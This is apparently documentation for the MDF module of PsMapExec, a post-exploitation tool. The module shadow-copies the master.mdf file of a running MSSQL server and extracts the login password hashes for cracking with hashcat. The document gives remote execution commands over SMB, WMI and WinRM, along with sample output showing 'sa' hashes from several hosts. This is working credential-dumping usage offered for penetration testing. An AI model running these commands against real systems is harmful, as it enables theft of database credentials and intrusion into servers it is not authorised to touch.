MDF

This module creates a Volume Shadow Copy of the running MSSQL database, allowing the master.mdf file to be safely copied even while in use. It then extracts the login password hashes found within the master database ready to be cracked with hashcat.

Based on Invoke-MDF: https://github.com/The-Viper-One/Invoke-DumpMDF Which is based on the original work of XPN: https://github.com/xpn/Powershell-PostExploitation/blob/master/Invoke-MDFHashes/Get-MDFHashes.ps1

Supported Methods

• SMB

• SessionHunter (WMI)

• WMI

• WinRM

Parameter	Value	Description
-ShowOutput	N/A	Displays each targets output to the console
-SuccessOnly	N/A	Display only successful results

Usage

# Standard execution
PsMapExec -Username [User] -Password [Pass] -targets [All] -Module MDF -Method [Method] -ShowOutput

PsMapExec -Targets servers -Method winrm -Module mdf -ShowOutput -SuccessOnly
Targets : Servers

WinRM   172.16.109.187  sql03.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\632364668.mdf

Name  : sa
Value : 0x020050B40C7843AC5C196F9375549D3566583A5C5D2E888353D0C3F9C973446A0
        
<-- Snip -->

WinRM   172.16.109.188  sql11.final.com    Windows Server 2019 Standard   [+] SUCCESS
[+] Database successfully copied to: C:\Users\tina\AppData\Local\1390080740.mdf

Name  : sa
Value : 0x02003D821CF3B3D1DE294A3CFED043AD755B33D3258A39A706B3AA282F72A81D50

<-- Snip -->